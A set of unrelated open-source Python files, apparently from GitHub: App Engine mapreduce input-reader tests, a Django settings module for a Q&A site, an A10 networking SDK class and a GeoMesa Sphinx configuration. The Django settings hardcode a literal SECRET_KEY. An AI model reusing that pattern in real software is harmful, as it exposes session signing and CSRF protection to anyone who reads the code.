os.environ["APPLICATION_ID"] = self.appid
self.zipdata = cStringIO.StringIO()
archive = zipfile.ZipFile(self.zipdata, "w")
for i in range(10):
archive.writestr("%d.txt" % i, "%d: %s" % (i, "*"*i))
archive.close()
def mockZipReader(self, blob_key):
"""Mocked out reader function that returns our in-memory zipfile."""
return self.zipdata
def testReadFirst(self):
"""Test that the first file in the zip is returned correctly."""
reader = input_readers.BlobstoreZipInputReader("", 0, 1, self.mockZipReader)
file_info, data_func = reader.next()
self.assertEqual(file_info.filename, "0.txt")
self.assertEqual(data_func(), "0: ")
def testReadLast(self):
"""Test we can read right up to the last file in the zip."""
reader = input_readers.BlobstoreZipInputReader("", 9, 10,
self.mockZipReader)
file_info, data_func = reader.next()
self.assertEqual(file_info.filename, "9.txt")
self.assertEqual(data_func(), "9: *********")
def testStopIteration(self):
"""Test that StopIteration is raised when we fetch past the end."""
reader = input_readers.BlobstoreZipInputReader("", 0, 1, self.mockZipReader)
reader.next()
self.assertRaises(StopIteration, reader.next)
def testSplitInput(self):
"""Test that split_input functions as expected."""
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.READER_NAME,
"mapper_params": {"blob_key": ["foo"]},
"mapper_shard_count": 2})
readers = input_readers.BlobstoreZipInputReader.split_input(
mapper_spec, self.mockZipReader)
self.assertEqual(len(readers), 2)
self.assertEqual(str(readers[0]), "blobstore.BlobKey(['foo']):[0, 7]")
self.assertEqual(str(readers[1]), "blobstore.BlobKey(['foo']):[7, 10]")
def testJson(self):
"""Test that we can persist/restore using the json mechanism."""
reader = input_readers.BlobstoreZipInputReader("someblob", 0, 1,
self.mockZipReader)
json = reader.to_json()
self.assertEquals({"blob_key": "someblob",
"start_index": 0,
"end_index": 1},
json)
reader2 = input_readers.BlobstoreZipInputReader.from_json(json)
self.assertEqual(str(reader), str(reader2))
class BlobstoreZipLineInputReaderTest(unittest.TestCase):
READER_NAME = ("mapreduce.input_readers."
"BlobstoreZipLineInputReader")
def setUp(self):
unittest.TestCase.setUp(self)
self.appid = "testapp"
os.environ["APPLICATION_ID"] = self.appid
def create_zip_data(self, blob_count):
"""Create blob_count blobs with uneven zip data."""
self.zipdata = {}
blob_keys = []
for blob_number in range(blob_count):
stream = cStringIO.StringIO()
archive = zipfile.ZipFile(stream, "w")
for file_number in range(3):
lines = []
for i in range(file_number + 1):
lines.append("archive %s file %s line %s" %
(blob_number, file_number, i))
archive.writestr("%d.txt" % file_number, "\n".join(lines))
archive.close()
blob_key = "blob%d" % blob_number
self.zipdata[blob_key] = stream
blob_keys.append(blob_key)
return blob_keys
def mockZipReader(self, blob_key):
"""Mocked out reader function that returns our in-memory zipfile."""
return self.zipdata.get(blob_key)
def split_input(self, blob_count, shard_count):
"""Generate some blobs and return the reader's split of them."""
blob_keys = self.create_zip_data(blob_count)
mapper_spec = model.MapperSpec.from_json({
"mapper_handler_spec": "FooHandler",
"mapper_input_reader": self.READER_NAME,
"mapper_params": {"blob_keys": blob_keys},
"mapper_shard_count": shard_count})
readers = input_readers.BlobstoreZipLineInputReader.split_input(
mapper_spec, self.mockZipReader)
return readers
def testSplitInputOneBlob(self):
"""Simple case: split one blob into two groups."""
readers = self.split_input(1, 2)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
def testSplitInputOneBlobFourShards(self):
"""Corner case: Ask for more shards than we can deliver."""
readers = self.split_input(1, 4)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
def testSplitInputTwoBlobsTwoShards(self):
"""Simple case: Ask for num shards == num blobs."""
readers = self.split_input(2, 2)
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
def testSplitInputTwoBlobsFourShards(self):
"""Easy case: Files split nicely into blobs."""
readers = self.split_input(2, 4)
self.assertEqual(4, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 2]:0", str(readers[2]))
self.assertEqual("blobstore.BlobKey('blob1'):[2, 3]:0", str(readers[3]))
def testSplitInputTwoBlobsSixShards(self):
"""Corner case: Shards don't split nicely so we get too few."""
readers = self.split_input(2, 6)
# Note we might be able to make this return 6 with a more clever algorithm.
self.assertEqual(4, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 2]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob0'):[2, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 2]:0", str(readers[2]))
self.assertEqual("blobstore.BlobKey('blob1'):[2, 3]:0", str(readers[3]))
def testSplitInputTwoBlobsThreeShards(self):
"""Corner case: Shards don't split nicely so we get too few."""
readers = self.split_input(2, 3)
# Note we might be able to make this return 3 with a more clever algorithm.
self.assertEqual(2, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
def testSplitInputThreeBlobsTwoShards(self):
"""Corner case: More blobs than requested shards."""
readers = self.split_input(3, 2)
self.assertEqual(3, len(readers))
self.assertEqual("blobstore.BlobKey('blob0'):[0, 3]:0", str(readers[0]))
self.assertEqual("blobstore.BlobKey('blob1'):[0, 3]:0", str(readers[1]))
self.assertEqual("blobstore.BlobKey('blob2'):[0, 3]:0", str(readers[2]))
def testReadOneLineFile(self):
"""Test that the first file in the zip is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 1, 0,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 0, 0), offset_info)
self.assertEqual("archive 0 file 0 line 0", line)
# This file only has one line.
self.assertRaises(StopIteration, reader.next)
def testReadTwoLineFile(self):
"""Test that the second file in the zip is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 1, 2, 0,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 1, 0), offset_info)
self.assertEqual("archive 0 file 1 line 0", line)
offset_info, line = reader.next()
self.assertEqual(("blob0", 1, 24), offset_info)
self.assertEqual("archive 0 file 1 line 1", line)
# This file only has two lines.
self.assertRaises(StopIteration, reader.next)
def testReadSecondLineFile(self):
"""Test that the second line is returned correctly."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 2, 3, 5,
self.mockZipReader)
offset_info, line = reader.next()
self.assertEqual(("blob0", 2, 24), offset_info)
self.assertEqual("archive 0 file 2 line 1", line)
# If we persist/restore the reader, the new one should pick up where
# we left off.
reader2 = input_readers.BlobstoreZipLineInputReader.from_json(
reader.to_json(), self.mockZipReader)
offset_info, line = reader2.next()
self.assertEqual(("blob0", 2, 48), offset_info)
self.assertEqual("archive 0 file 2 line 2", line)
def testReadAcrossFiles(self):
"""Test that we can read across all the files in the single blob."""
self.create_zip_data(1)
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 3, 0,
self.mockZipReader)
for file_number in range(3):
for i in range(file_number + 1):
offset_info, line = reader.next()
self.assertEqual("blob0", offset_info[0])
self.assertEqual(file_number, offset_info[1])
self.assertEqual("archive %s file %s line %s" % (0, file_number, i),
line)
self.assertRaises(StopIteration, reader.next)
def testJson(self):
"""Test that we can persist/restore using the json mechanism."""
reader = input_readers.BlobstoreZipLineInputReader("blob0", 0, 3, 20,
self.mockZipReader)
json = reader.to_json()
self.assertEquals({"blob_key": "blob0",
"start_file_index": 0,
"end_file_index": 3,
"offset": 20},
json)
reader2 = input_readers.BlobstoreZipLineInputReader.from_json(json)
self.assertEqual(str(reader), str(reader2))
# Dummy start up time of a mapreduce.
STARTUP_TIME_US = 1000
class MockUnappliedQuery(object):
"""Mocks unapplied query in order to mimic existence of unapplied jobs."""
def __init__(self, results):
"""Constructs unapplied query with given results."""
self.results = results
self.has_unapplied_filter = False
def __setitem__(self, qfilter, value):
"""Sets a query filter."""
if qfilter == '__key__ <=':
pass
elif (qfilter == '__unapplied_log_timestamp_us__ <' and
value == STARTUP_TIME_US):
self.has_unapplied_filter = True
else:
raise Exception('Unexpected filter %s %s' % (qfilter, value))
def Get(self, limit):
"""Fetches query results."""
if not self.has_unapplied_filter:
raise Exception('Unapplied filter hasn\'t been set')
if limit != input_readers.ConsistentKeyReader._BATCH_SIZE:
raise Exception('Unexpected limit %s' % limit)
return self.results
class ConsistentKeyReaderTest(unittest.TestCase):
"""Tests for the ConsistentKeyReader."""
MAPREDUCE_READER_SPEC = ('%s.%s' %
(input_readers.ConsistentKeyReader.__module__,
input_readers.ConsistentKeyReader.__name__))
def setUp(self):
"""Sets up the test harness."""
unittest.TestCase.setUp(self)
self.app_id = 'myapp'
self.kind_id = 'somekind'
self.mapper_params = {
'entity_kind': self.kind_id,
'start_time_us': STARTUP_TIME_US,
'enable_quota': False}
self.mapper_spec = model.MapperSpec.from_json({
'mapper_handler_spec': 'FooHandler',
'mapper_input_reader': ConsistentKeyReaderTest.MAPREDUCE_READER_SPEC,
'mapper_params': self.mapper_params,
'mapper_shard_count': 10})
self.reader = input_readers.ConsistentKeyReader(
self.kind_id,
[key_range.KeyRange()],
start_time_us=STARTUP_TIME_US)
os.environ['APPLICATION_ID'] = self.app_id
self.datastore = datastore_file_stub.DatastoreFileStub(
self.app_id, '/dev/null', '/dev/null')
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', self.datastore)
self.mox = mox.Mox()
def tearDown(self):
"""Verifies mox expectations."""
try:
self.mox.VerifyAll()
finally:
self.mox.UnsetStubs()
def testSplitInputNoData(self):
"""Splits empty input among several shards."""
readers = input_readers.ConsistentKeyReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals(self.kind_id, r._entity_kind)
self.assertEquals(STARTUP_TIME_US, r.start_time_us)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
def testSplitInput(self):
"""Splits input among several shards."""
for _ in range(100):
datastore.Put(datastore.Entity(self.kind_id))
readers = input_readers.ConsistentKeyReader.split_input(self.mapper_spec)
self.assertEquals(10, len(readers))
for r in readers:
self.assertEquals(self.kind_id, r._entity_kind)
self.assertEquals(STARTUP_TIME_US, r.start_time_us)
# The end ranges should be half-open.
self.assertEquals(None, readers[0]._key_ranges[0].key_start)
self.assertEquals(None, readers[-1]._key_ranges[0].key_end)
def testReaderGeneratorSimple(self):
"""Tests reader generator when there are no unapplied jobs."""
k1 = datastore.Put(datastore.Entity(self.kind_id))
k2 = datastore.Put(datastore.Entity(self.kind_id))
keys = list(self.reader)
self.assertEquals([k1, k2], keys)
def testReaderGeneratorSimpleWithEmptyDatastore(self):
"""Tests reader generator when there are no unapplied jobs or entities."""
keys = list(self.reader)
self.assertEquals([], keys)
def testReaderGeneratorUnappliedJobs(self):
"""Tests reader generator when there are some unapplied jobs."""
k1 = datastore.Put(datastore.Entity(self.kind_id))
k2 = datastore.Put(datastore.Entity(self.kind_id))
dummy_k1 = db.Key.from_path(
*(k1.to_path() + [input_readers.ConsistentKeyReader.DUMMY_KIND,
input_readers.ConsistentKeyReader.DUMMY_ID]))
dummy_k2 = db.Key.from_path(
*(k2.to_path() + [input_readers.ConsistentKeyReader.DUMMY_KIND,
input_readers.ConsistentKeyReader.DUMMY_ID]))
# This method is used only for unapplied query construction.
self.mox.StubOutWithMock(
key_range.KeyRange, 'make_ascending_datastore_query')
self.mox.StubOutWithMock(db, 'get')
datastore_query = datastore.Query(self.kind_id, keys_only=True)
empty_query = datastore.Query('nosuchkind')
# Applying jobs first.
key_range.KeyRange.make_ascending_datastore_query(
kind=None, keys_only=True).AndReturn(MockUnappliedQuery([k1, k2]))
db.get([dummy_k1, dummy_k2], config=mox.IgnoreArg())
key_range.KeyRange.make_ascending_datastore_query(
kind=None, keys_only=True).AndReturn(MockUnappliedQuery([]))
# Fetch all keys; no unapplied jobs remain.
key_range.KeyRange.make_ascending_datastore_query(
kind=self.kind_id, keys_only=True).AndReturn(datastore_query)
key_range.KeyRange.make_ascending_datastore_query(
kind=self.kind_id, keys_only=True).AndReturn(empty_query)
self.mox.ReplayAll()
keys = list(self.reader)
self.assertEquals([k1, k2], keys)
class NamespaceInputReaderTest(unittest.TestCase):
"""Tests for NamespaceInputReader."""
MAPREDUCE_READER_SPEC = ('%s.%s' %
(input_readers.NamespaceInputReader.__module__,
input_readers.NamespaceInputReader.__name__))
def setUp(self):
unittest.TestCase.setUp(self)
self.app_id = 'myapp'
self.mapper_spec = model.MapperSpec.from_json({
'mapper_handler_spec': 'FooHandler',
'mapper_input_reader': NamespaceInputReaderTest.MAPREDUCE_READER_SPEC,
'mapper_params': {},
'mapper_shard_count': 10})
os.environ['APPLICATION_ID'] = self.app_id
self.datastore = datastore_file_stub.DatastoreFileStub(
self.app_id, '/dev/null', '/dev/null')
apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', self.datastore)
def testSplitInputNoData(self):
"""Test reader with no data in datastore."""
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals([], list(r))
def testSplitDefaultNamespaceOnly(self):
"""Test reader with only default namespace populated."""
TestEntity().put()
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals([''], list(r))
def testSplitNamespacesPresent(self):
"""Test reader with multiple namespaces present."""
TestEntity().put()
for i in range(5):
namespace_manager.set_namespace(str(i))
TestEntity().put()
namespace_manager.set_namespace(None)
readers = input_readers.NamespaceInputReader.split_input(self.mapper_spec)
self.assertEquals(1, len(readers))
r = readers[0]
self.assertEquals('__namespace__', r._entity_kind)
self.assertEquals(None, r._key_ranges[0].key_start)
self.assertEquals(None, r._key_ranges[0].key_end)
# test read
self.assertEquals(['', '0', '1', '2', '3', '4'], list(r))
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "2c02d31e88aaae6f25d9ddbd12af8c79",
"timestamp": "",
"source": "github",
"line_count": 1296,
"max_line_length": 80,
"avg_line_length": 37.182870370370374,
"alnum_prop": 0.6121521509058084,
"repo_name": "akbertram/appengine-mapreduce",
"id": "7fa7420ba015d91c4aac8f9b95b5a21ec15a067b",
"size": "48909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/test/mapreduce/input_readers_test.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "421877"
},
{
"name": "JavaScript",
"bytes": "35362"
},
{
"name": "Python",
"bytes": "545778"
},
{
"name": "Shell",
"bytes": "1723"
}
],
"symlink_target": ""
}
|
import os
from unipath import FSPath as Path
import djcelery
from django.core.urlresolvers import reverse
PROJECT_DIR = Path(__file__).absolute().ancestor(3)
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = ()
MANAGERS = ADMINS
INTERNAL_IPS = ('127.0.0.1',)
# TODO: test if the next line is good for us
# SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
TIME_ZONE = 'Asia/Jerusalem'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
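# A no-op gettext here just marks the language names below for translation
# without importing django.utils.translation at settings load time.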
gettext = lambda s: s
LANGUAGES = (
('he', gettext('Hebrew')),
('en', gettext('English')),
('ar', gettext('Arabic')),
('ru', gettext('Russian')),
)
LANGUAGE_CODE = LANGUAGES[0][0]
MODELTRANSLATION_DEFAULT_LANGUAGE = LANGUAGE_CODE
MODELTRANSLATION_FALLBACK_LANGUAGES = (LANGUAGES[0][0], LANGUAGES[1][0],
LANGUAGES[2][0], LANGUAGES[3][0])
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
MEDIA_ROOT = PROJECT_DIR.child('media')
STATIC_ROOT = PROJECT_DIR.child('static_root')
STATICFILES_ROOT = PROJECT_DIR.child('static')
LOCALE_PATHS = (unicode(PROJECT_DIR.child('locale')), )
STATICFILES_DIRS = [
(subdir, str(STATICFILES_ROOT.child(subdir))) for subdir in
('css', 'img', 'js', )]
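# Each entry is a prefixed (subdir, absolute-path) pair, so files under e.g.
# PROJECT_DIR/static/css are collected and served beneath a 'css/' prefix.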
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
SECRET_KEY = "'piotu34fh89v67b4c2y0[R89N21CB[YUIP'NXREQL;BYCW9"
FIXTURE_DIRS = ("fixtures", )
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'bootstrap_pagination.middleware.PaginationMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'oshot.middleware.DefaultEntity',
)
ROOT_URLCONF = 'oshot.urls'
TEMPLATE_DIRS = (
PROJECT_DIR.child('templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.core.context_processors.request",
"django.contrib.messages.context_processors.messages",
'oshot.context_processors.forms',
'social_auth.context_processors.social_auth_by_name_backends',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.humanize',
'django.contrib.admindocs',
'django.contrib.sitemaps',
'django.contrib.flatpages',
'django_extensions',
'taggit',
'social_auth',
'haystack',
'south',
'crispy_forms',
'storages',
'gunicorn',
'bootstrap_pagination',
'django_nose',
'registration',
'flatblocks',
'uuidfield',
'autoslug',
'entities',
'chosen',
'modeltranslation',
'djcelery',
'celery_haystack',
'djcelery_email',
'devserver',
'avatar',
'actstream',
'debug_toolbar',
'djsupervisor',
'django_behave',
# local apps
'qa',
'user',
'taggit_autosuggest',
# from open-Knesset
'links',
'polyorg',
)
AUTHENTICATION_BACKENDS = (
'social_auth.backends.twitter.TwitterBackend',
'social_auth.backends.facebook.FacebookBackend',
'social_auth.backends.google.GoogleOAuth2Backend',
'django.contrib.auth.backends.ModelBackend',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'ERROR',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins', 'console'],
'level': 'ERROR',
'propagate': True,
},
}
}
ACCOUNT_ACTIVATION_DAYS = 7 # One-week activation window; you may, of course, use a different value.
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/u/login/'
DEFAULT_FROM_EMAIL = 'localshot@hasadna.org.il'
#TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
TEST_RUNNER = 'django_behave.runner.DjangoBehaveTestSuiteRunner'
SITE_ID = os.environ.get('SITE_ID', 1)
TWITTER_CONSUMER_KEY = os.environ.get('TWITTER_CONSUMER_KEY')
TWITTER_CONSUMER_SECRET = os.environ.get('TWITTER_CONSUMER_SECRET')
FACEBOOK_APP_ID = os.environ.get('FACEBOOK_APP_ID')
FACEBOOK_API_SECRET = os.environ.get('FACEBOOK_API_SECRET')
GOOGLE_OAUTH2_CLIENT_ID = os.environ.get('GOOGLE_OAUTH2_CLIENT_ID')
GOOGLE_OAUTH2_CLIENT_SECRET = os.environ.get('GOOGLE_OAUTH2_CLIENT_SECRET')
GOOGLE_OAUTH_EXTRA_SCOPE = ['https://www.googleapis.com/auth/userinfo.profile']
ADMIN_NAME = os.environ.get('ADMIN_NAME', 'open-qna')
ADMIN_EMAIL = os.environ.get('ADMIN_EMAIL', 'open-qna@hasadna.org.il')
SOCIAL_AUTH_PIPELINE = (
'social_auth.backends.pipeline.social.social_auth_user',
'social_auth.backends.pipeline.associate.associate_by_email',
'social_auth.backends.pipeline.user.get_username',
'social_auth.backends.pipeline.user.create_user',
'social_auth.backends.pipeline.social.associate_user',
'social_auth.backends.pipeline.social.load_extra_data',
'user.utils.get_user_avatar',
)
FACEBOOK_EXTENDED_PERMISSIONS = ['email', 'publish_actions']
ACCOUNT_ACTIVATION_DAYS = 4
ADMINS = [(ADMIN_NAME, ADMIN_EMAIL), ]
MANAGERS = ADMINS
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': os.path.join(PROJECT_DIR, 'whoosh_index'),
},
}
AUTO_GENERATE_AVATAR_SIZES = (75, 48)
ABSOLUTE_URL_OVERRIDES = {
'auth.user': lambda u: reverse("public-profile", args = (u.username,)),
}
AVATAR_MAX_AVATARS_PER_USER = 1
AVATAR_GRAVATAR_BACKUP = False
AVATAR_DEFAULT_URL = "http://ok-qa-media.s3.amazonaws.com/img/question_comix.png"
QNA_DEFAULT_ENTITY_ID = 277
CACHES = {
'default': {
'BACKEND':
'django.core.cache.backends.dummy.DummyCache',
}
}
LONG_CACHE_TIME = 18000 # 5 hours
MIN_EDITORS_PER_LOCALITY = 3
|
{
"content_hash": "1fbd816ef38310b616e7fa0a0582b0b6",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 100,
"avg_line_length": 29.677551020408163,
"alnum_prop": 0.670196671709531,
"repo_name": "hasadna/open-shot",
"id": "6353d4bcf829e91b85134e2dd8a4e940ecc442c6",
"size": "7312",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "oshot/settings/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "40636"
},
{
"name": "JavaScript",
"bytes": "10528"
},
{
"name": "Python",
"bytes": "586576"
},
{
"name": "Shell",
"bytes": "3784"
}
],
"symlink_target": ""
}
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Udp(A10BaseClass):
"""Class Description::
Set UDP STUN timeout.
Class udp supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.
:param port_start: {"description": "Port Range (Port Range Start)", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}
:param port_end: {"description": "Port Range (Port Range End)", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}
:param timeout: {"description": "STUN timeout in minutes (default: 2 minutes)", "format": "number", "type": "number", "maximum": 60, "minimum": 0, "optional": true}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/lsn/stun-timeout/udp/{port_start}+{port_end}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
        self.required = ["port_start", "port_end"]
        self.b_key = "udp"
        self.a10_url = "/axapi/v3/cgnv6/lsn/stun-timeout/udp/{port_start}+{port_end}"
self.DeviceProxy = ""
self.port_start = ""
self.port_end = ""
self.timeout = ""
self.uuid = ""
        for key, value in kwargs.items():
            setattr(self, key, value)
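# Illustrative usage sketch (not part of the original a10sdk module); the
# session wiring and the exact CRUD helper name are assumptions here:
#
#     udp = Udp(port_start=3478, port_end=3479, timeout=5)
#     udp.DeviceProxy = session  # an authenticated a10sdk DeviceProxy (assumed)
#     udp.create()               # CRUD helpers are provided by A10BaseClass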
|
{
"content_hash": "cc64ca6b785b6eda54e60aca9339de3d",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 168,
"avg_line_length": 39.142857142857146,
"alnum_prop": 0.6192214111922141,
"repo_name": "a10networks/a10sdk-python",
"id": "83dcb3ade086dfe06cd58bb5f81257a298409263",
"size": "1644",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "a10sdk/core/cgnv6/cgnv6_lsn_stun_timeout_udp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "6956372"
}
],
"symlink_target": ""
}
|
import sys
import os
import shlex
# themes/plugins
import sphinx_rtd_theme
from recommonmark.parser import CommonMarkParser
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
'sphinx_tabs.tabs',
'sphinx_copybutton'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# Custom source parsers
source_parsers = {
'.md': CommonMarkParser,
}
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'GeoMesa'
# note: shown in our custom footer
copyright = u'2013-2021'
author = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Warning: current version numbers are handled in versions.py, which is preprocessed
# by Maven. Do not hardcode current GeoMesa version numbers here!
from target.versions import release, version, release_version, scala_binary_version
# Other versions and variables unlikely to change on every point release
url_github_archive = "https://github.com/locationtech/geomesa/archive"
url_locationtech_release = "https://repo.eclipse.org/content/repositories/geomesa-releases/org/locationtech/geomesa"
# RST appended to every file. Used for global substitutions.
# (the "%(release)s" substitutions are done by the Python format() method
# prior to appending the RST epilog to each file)
rst_epilog = """
.. _GeoTools: http://geotools.org/
.. _GeoServer: http://geoserver.org/
.. _Java JDK 8: http://www.oracle.com/technetwork/java/javase/downloads/index.html
.. |release_tarball_accumulo| replace:: %(url_locationtech_release)s/geomesa-accumulo-dist_%(scala_binary_version)s/%(release_version)s/geomesa-accumulo_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_kafka| replace:: %(url_locationtech_release)s/geomesa-kafka-dist_%(scala_binary_version)s/%(release_version)s/geomesa-kafka_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_hbase| replace:: %(url_locationtech_release)s/geomesa-hbase-dist_%(scala_binary_version)s/%(release_version)s/geomesa-hbase_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_tarball_cassandra| replace:: %(url_locationtech_release)s/geomesa-cassandra-dist_%(scala_binary_version)s/%(release_version)s/geomesa-cassandra_%(scala_binary_version)s-%(release_version)s-bin.tar.gz
.. |release_source_tarball| replace:: %(url_github_archive)s/geomesa_%(scala_binary_version)s-%(release_version)s.tar.gz
.. |maven_version| replace:: 3.5.2 or later
.. |geoserver_version| replace:: 2.17.3
.. |geotools_version| replace:: 23.x
.. |accumulo_required_version| replace:: 1.7.x, 1.8.x, 1.9.x or 2.0.x
.. |accumulo_supported_versions| replace:: versions 1.7.x, 1.8.x, 1.9.x and 2.0.x
.. |hbase_required_version| replace:: 1.4.x or 2.2.x
.. |hbase_supported_versions| replace:: versions 1.4.x and 2.2.x
.. |hbase_bundled_version| replace:: 2.2.3
.. |hadoop_version| replace:: 2.8 or later
.. |zookeeper_version| replace:: 3.4.5 or later
.. |kafka_version| replace:: 0.10.x or later
.. |kafka_tested_version| replace:: 2.7.0
.. |cassandra_version| replace:: 3.x
.. |redis_version| replace:: 5.0.x
.. |kudu_version| replace:: 1.7.x
.. |spark_required_version| replace:: 2.4.x, 3.0.x or 3.1.x
.. |spark_supported_versions| replace:: versions 2.4.x, 3.0.x and 3.1.x
.. |release_version| replace:: %(release_version)s
.. |release_version_literal| replace:: ``%(release_version)s``
.. |scala_binary_version| replace:: %(scala_binary_version)s
.. |scala_release_version| replace:: ``%(scala_binary_version)s-%(release_version)s``
""" % {"release": release,
"release_version": release_version,
"scala_binary_version": scala_binary_version,
"url_locationtech_release": url_locationtech_release,
"url_github_archive": url_github_archive}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
